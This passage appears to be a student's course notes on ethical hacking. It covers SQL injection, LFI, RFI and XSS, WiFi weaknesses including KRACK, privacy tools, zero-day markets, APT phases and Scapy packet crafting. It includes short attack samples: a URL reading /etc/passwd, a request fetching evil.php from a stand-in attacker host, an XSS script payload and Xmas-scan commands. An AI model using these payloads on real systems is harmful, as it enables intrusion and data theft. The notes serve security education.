noted. d. Safeguard trade secrets – Private and confidential information should be well kept and not easily accessible. e. Escort – All guests should be escorted at all times when in the premises. f. Password change – Enforce employees to change their passwords regularly (~3 months) g. Security awareness training – Mandatory cybersecurity training should be conducted regularly (~4-6 months) 2. Individual POV’s a. Do not divulge private information – Social engineers might approach you via social media platforms. b. Do not click on suspicious website links – Fraudulent emails or SMS might contain links that request personal information such as your login credentials. c. Do not allow strangers to access your wireless network – Malware or network analyzer might be put inside your system. Lecture 5-2: Web Penetration ➢ It allows the attacker to influence the SQL queries that an application passes to a back-end database. Usually, a malicious code is placed in the SQL query via webpage input. ➢ Damages SQL injection can cause: o Tampering with existing data in database o Disclosure of all data on the system (login credentials) o Voiding transactions or changing balances o Destroying the data in database or making it unavailable ➢ Prevention o Use of parameterized statements – where data and code are separated (most effective) The whole xyz ‘ 1=1#’ is considered a string. (Parameterized statements ensure any user input → “converted” to strings instead of a logic operator) o Filtering ▪ Make backlists of known-to-be-dangerous patterns, characters, and commands. (e.g., union, etc) ▪ Make whitelists of allowed operators. o Give users least privilege ▪ Following the Principle of Least Privilege, only give the users sufficient/limited privileges in order to proper execute their tasks. Web vulnerabilities: concept and prevention Type of web Description vulnerability File upload Attacker uploads Command execution Local file inclusion (LFI) any executable files such as a PHP file to a vulnerable website. Attackers are able to execute OS commands on the target web server. It can be used to obtain a reverse shell by making the target server connect to the attacker’s machine. A web vulnerability caused by mistakes made by a programmer of a website or web application. Tools used Weevely – A PHP backdoor generator tool in Kali Once the PHP file has been uploaded and executed, a backdoor will be created between Kali and the target website for stealthy web shell. For example, Unix commands could be executed on the website to create a reverse shell and connect to Kali. On Kali, the attacker can execute non-interactive commands or do a file transfer. Attacker simply change the URL from: https://example-site.com/?module=contact.php to: https://example-site.com/?module=/etc/passwd And in the absence of proper filtering, the server will display the sensitive content of the /etc/passwd file → lead to further attacks. It is used to trick the web application into exposing or running files on the web server. (Directory Traversal is also possible) Remote file inclusion (RFI) Listed as one of the OWASP Top 10 web application vulnerabilities. An attack conducted when the web application downloads and executes a remote file. The attacker could make the following HTTP request to trick the application into executing server-side malicious code, for example, a backdoor. http://example.com/?file=http://attacker.example.com/evil.php Cross-Site Scriping (XSS) XSS enables attackers to inject client-side script into webpages viewed by other users. (Code is NOT executed on the server) Reflected (non-persistent) XSS ➢ Only works if the user visits a specially crafted URL. ➢ Example URL: http://victim.com/page.php?somevar=<script>alert("Hacked")</script> Stored (persistent) XSS → More dangerous ➢ It is persistent as the malicious code can be stored into the page/database → malicious code will be executed every time the page is loaded on any user’s machine. The difference between reflected and stored XSS attacks is that reflected XSS only works if the victim enters the webpage with a custom edited URL as compared to stored XSS which will be automatically executed on any user. Methods to prevent XSS vulnerability: 1. Escape any untrusted input. 2. Minimize the manipulation of user input on html. Lecture 6-1: Wireless Network Penetration and Privacy Tools Basics of WiFi ➢ It is a consumer-friendly name for Wireless LAN technology based on IEEE 802.11 standards. Advantages Convenience – As it allows users to access network resources from the nearby vicinity. Reduced cost – Savings in cost and labor associated to running physical cables. Disadvantages Range – Wireless network signals might be affected by interface or obstacles. Speed – More drop in performance than wired networks as wireless network signals are more subjected to interference. Expandability – Wireless networks can handle the suddenly-increased number of clients, however in a wired network, additional wiring will be required. Security – Less secure than wired networks as attackers can only intercept wired networks via physical access. Wireless Networking Modes Ad-hoc Infrastructure Description Cost effective – It does not require any equipment except for wireless adapters. Peer-to-peer (P2P) communication – Suitable for small network. Monitor Access Point – It can provide Internet connectivity to multiple clients. Monitoring – It allows a user to monitor all traffic received on a wireless channel. Communication – All clients communicate with the AP. It can also be used for packet sniffing; however, it only applies to wireless networks. Connection – In order for clients to access the Internet via the AP, they will have to know the SSID (Service Set Identifier, WiFi name) Scalability – It is much more scalable than ad-hoc mode. Best Example Mobile phone hotspot – Devices can connect to the hotspot for Internet access Home WiFi – Any users can access connect to the router provided if they know the SSID (WiFi name) and the network key (password) Airmon-ng script – To put the network card into monitor mode to capture packets if they aren’t directed to your computer. Wireless Equivalent Privacy (WEP): Vulnerabilities ➢ It was the first attempt at wireless protection. The goal was to add security to wireless networks by encrypting data. Even if the data was intercepted, it will not be readable as the data has already been encrypted. ➢ However, it is almost out of rotation as it has serious security problems such as: o Initial Vector (IV) problem ▪ IV is only 24 bits long, short and reused. (24-bit keys allow for ~16.7 million possibilities, on a busy network, this number can be easily achieved in a matter of hours.) ▪ WEP does not choose the IV at random. ▪ WEP does not use counter to make IV unique. o Weak algorithms problem ▪ The encryption algorithm RC4 used is known to be weak. ▪ The integrity check algorithm CRC-32 is known to be weak. WiFi Protected Access (WPA/WPA2) ➢ Functionalities o Same goal as WEP, but stronger security. (WPA2 is based on stronger crypto functions like AES, CBC-MAC and etc.) o The client and Access Point (AP) share the common secret (passphrase) called “PMK” from which 2 entities will develop keys for encryption and authentication. ▪ PMK (Pairwise Master Key) – It is a passphrase pre-shared between AP and the client. ▪ PTK (Pair Transient Key) – It is derived from PMK as follows: ➢ Vulnerabilities o Key Reinstallation Attack (KRACK) ▪ The attacker will manipulate and replaying cryptographic handshake messages to trick the victim into reinstalling an already-in-use key. ▪ When the victim reinstalls the key, associated parameters such as nonce are reset to their initial value. ▪ By forcing the nonce reuse in this manner, the encryption protocol can be attacked (e.g., packets can be replayed, decrypted, forged) When a client joins a network, the 4-way handshake will be executed to negotiate a fresh encryption key. Client will install this key after receiving message 3. If an acknowledgement is not received, message 3 will be retransmitted to the client. Each time the client receives the message, the same encryption key will be reinstalled, thereby resetting the nonce and receive replay counter. The attacker can take advantage of nonce resets by collecting and replaying retransmissions of message 3, leading to encryption protocol attack. WPA/WPA2 Enterprise ➢ Since WPA/WPA2 uses a pre-shared key, WPA/WPA2 enterprise uses an additional component called Remote Authentication Dial-In User Service (RADIUS) server. o The RADIUS server manages client authentication and generates a PMK for each client. o The client and the AP agree on supported security protocols on the PMK. o The RADIUS server sends the PMK (of the authenticated client) to the AP. o The AP and the client will generate a PTK (Pair Transient Key), depending on the current session → A secure tunnel between the client and AP is established. ➢ Advantages of RADIUS: o PMK (Pairwise Master Key) is unique to each user (client), it does not have to be shared by any other user. o Even if a client is revoked, we do not need to worry about the leakage of the PMK. Lecture 6-2: Privacy Tools (2) & Miscellaneous Topics Privacy ➢ The term “privacy” is a double-edged sword o It can provide a user with a state free from being watched. o It can provide a hacker with a tool that can hide their tracks of attack. ➢ Anonymity – Providing privacy does not always mean providing anonymity but anonymity is an essential part of privacy. Privacy Tools Definition Virtual Private Network (VPN) Tor/Onion Routing All the IP packets from the source and a VPN server are encrypted through IPSec. It directs Internet traffic through a volunteer overlay network, consisting of more than 7000 relays. (Concealing a user’s location and usage from anyone perform network surveillance) All Internet activity of the user is routed through the VPN server. VPN can hide the user’s physical location. Tor users can use the Internet by connecting through a series of virtual tunnels rather than making a direct connection. Internet Protocol Security (IPSec) It is a group of protocols that are used together to set up encrypted connections between devices. It is a framework of open standards that provides, between participating peers at the IP layer with 1. Data confidentiality 2. Data integrity 3. Data authentication IPSec can protect data flows between 1. A pair of hosts 2. A pair of security gateways 3. Between a security gateway and a host DNS Encryption Protection based on cryptography (GPG) A DNS query leaks the information about the sites the user is communicating with. It can use both symmetric and asymmetric encryption to encrypt, decrypt and sign messages using public and private keys. ISP can snoop the entries in the DNS server it is running. Examples Originally VPN was created for employees to securely connect to their company’s network remotely. To create a private network path using Tor, the client builds a virtual circuit of encrypted connections (Onion Routing) one by one through nodes on the network. Between each hop, a separate set of encryption keys are negotiated to ensure that each hop can’t trace these connection as they pass through. Maximum 1 hop per node in the circuit. Limitations It can compromise anonymity and activity of the source. User’s misconfiguration can lead to compromise of anonymity. Most popular application of IPSec is a VPN. Most company uses VPN because it is cheaper than building a dedicated private network. Tunnel mode – It is the default mode. IPSec wraps the original IP packet, encrypts it, adds a new IP header, and sends it to the other side of the VPN tunnel. Transport mode – Only the payload of the IP packet is encrypted. (Does not provide full anonymity as IP address is revealed) Wide access range – If a user is connecting to a corporate network from his home network, if malware is present, it can spread to the computers in the corporate network. DNS over HTTPS – Encrypt all the DNS queries through TLS. It allows sensitive information to be easily shared across an insecure network. Even if a malicious actor manages to intercept the message, he does not have the correct private key to decrypt it. ➢ Anonymous-friendly Search Engines o Every major search engine today tracks almost 100% of the searches the users perform. (Google, Yahoo, Bing) o DuckDuckGo – This search engine takes to protect user privacy is to not use the filtering system that major search engines use to offer “personalized results”. o Private browsing mode – Browsers such as Google Chrome have a function called “Incognito mode”. Users can now browse privately, and all search history will be cleared once the user quits the browser. ➢ Other methods of protecting a hacker’s identity o Change MAC address o Use public WiFi with VPN o Boot a machine from a “live CD” and remove in when you are done. (It will be operated totally in the RAM) ➢ Zero-Day vulnerability o A vulnerability in a system that is not yet disclosed to the public, therefore it is not yet patched. o Even though the vulnerability might not be publicly known, other hackers or people who paid for the zero-day vulnerability might be quietly exploiting it. ➢ Zero-Day exploit o It is the code that the attackers use to take advantage of the Zero-Day vulnerability. o Attackers might use the exploit code to plant a virus or malware (Trojan Horse) onto a machine. o Zero-day exploit codes are extremely valuable and are not only used by hackers but government intelligence/spy agencies. Zero Day Markets Black market Grey market White market Description Criminal hackers sell/trade in ZeroDay vulnerabilities or exploits to anyone who is willing to offer a reward (cash reward/favors) or for their own personal usage. Examples Criminal hackers can take advantage of the Zero-Day can issue ransomware to companies (for example) usually in exchange for huge cash rewards. Defense contractors sell Zero-Day vulnerabilities or exploits to government intelligence agencies to use for surveillance and offensive computer operations. Often purchased by governments secretly, to ensure no one else knows about these vulnerabilities. Researchers or hackers disclose Zero-Day vulnerabilities or exploits to vendors, in exchange for money. Apple has offered bounties up to $2 million for their new privacy security feature for their devices, Lockdown mode. Advanced Persistent Threat (APT) ➢ An attack campaign conducted by a hacker or a group of hackers, to establish a long-term presence in a network in order to extract highly sensitive and valuable data. ➢ Hackers behind this attack campaign are experienced and well-resourced, some of them are backed up by government agencies to target carefully chosen and researched targets (including key individuals from companies or government). ➢ The sole purpose is to extract highly sensitive and value data that will give them a competitive advantage. (national security data or trade secrets) ➢ Unlike traditional hackers who target a wide range of victims and move on to something less secure, APT actors will persistently attack their targets regardless of many failed attempts. ➢ APT attacks are usually stealthy, concealing themselves within the target’s network and only interact enough to achieve the defined objectives. ➢ Some of the APT actors might purchase and take advantage of Zero-Day vulnerabilities and exploits to gain access to the target’s network/machine or to avoid detection. Phases of APT 1. Reconnaissance/Information gathering o Attackers will identify and study the targeted organization, collecting as much information as possible about the technical environment and key personnel in that organization. o Social engineering attacks and OSINT (Open Source Intelligence) gathering are used. 2. Delivery o Attackers deliver their exploits (malware) to the targets. o 2 types of delivery mechanisms: i. Direct delivery – The attackers send exploits to their targets via social engineering techniques (attack vectors), such as spear phishing. ii. Indirect delivery – Stealthy. Attackers will compromise a 3rd party that is trusted by the target, and then use the compromised 3rd party to indirectly serve exploits. 3. Initial Intrusion o It happens when the attacker gets a first unauthorized access to the target’s computer/network. o Upon delivering the exploit to the target in the delivery stage, the attacker will be able to gain access to the target’s computer after the malicious code has been executed that exploits a vulnerability in the target’s computer or using the user credentials obtained from social engineering attacks. 4. Command and control o After the attacker has successfully exploited a vulnerability in the target’s computer, a backdoor will be established. o The attacker will use Command and Control (C2) mechanisms to take control of the compromised computers, enabling further exploitation of the network. o To evade detection, the attackers increasingly make use of various legitimate services and publicly available tools. 5. Lateral movement o Once the communication between the compromised systems and C2 servers has been established, the attackers move inside the network, in order to expand their control over the targeted organization. o Lateral movement usually involves the following activities: i. Performing internal reconnaissance to map the network and acquire intelligence. ii. Compromising additional systems in order to harvest credentials and gain escalated privileges. iii. Identifying and collecting valuable digital assets, such as development plans, trade secrets, etc.. o This stage typically lasts a long period because: i. The attackers want to harvest a maximum of information over a long term. ii. The attacks are designed to run low and slow in order to avoid detection. iii. As APT actors move deeper into the network, their movements will be more difficult to detect. 6. Data exfiltration o Since one of the primary goals of an APT attack is to steal sensitive data in order to gain strategic benefits, this is a critical stage for the attackers. o Usually, the data is transferred to an internal staging server where the data is compressed and encrypted for transmission to external locations under the attackers’ control. o In order to hide the transmission process, attackers make use of secure protocols such as SSL/TLS or make use of the anonymity feature of the Tor network. Ransomware ➢ It is a type of malware that threatens to publish the victim’s data or permanently block access to it unless a ransom is paid. ➢ Cryptoviral extortion – It is an advanced technique where the victim’s files are encrypted, making them inaccessible and demands a ransom payment (via cryptocurrency) to decrypt them. As recovering the files without the decryption key is difficult, and it is very difficult to trace digital currency → difficult to trace the malicious actor as well. o Example Garmin 2020 – The hackers deployed the ransomeware tool WastedLocker, which encrypts key data on a company’s digital infrastructure, their services were disrupted. $10 million were demanded as ransom for the decryption key. Scappy Reference Table for flags, example XMAS flag CWR 0 ECE 0 URG 1 ACK 0 PSH 1 RST 0 SYN 0 0010 1001 2 9 FIN 1 0x29 Therefore, the commands to craft a packet with URG, PSH AND FIN flags (Xmas) to Metasploitable2 port 80 are: >>> a = IP(“10.0.2.4”) >>> b = TCP(dport=80, flags=0x29) >>> c = a/b >>> c >>> <IP frag=0 proto=tcp dst=10.0.2.4 |<TCP dport=http flags=FPU |>> >>> sr1(c) Command Syntax: a = IP(dst = “<Target IP>”) b = TCP(dport = <Port Number> , flags = <Hexadecimal> or “<Flag String>”) Examples using Metasplitable2’s IP address & dport = 80 (http): 1. Craft a TCP packet with a SYN flag 2. Craft a TCP packet with a NULL flag 3. Craft a TCP packet with (URG, PSH, FIN) flags (similar to Xmas scan) 4. Run multiple ports from port 80 to 84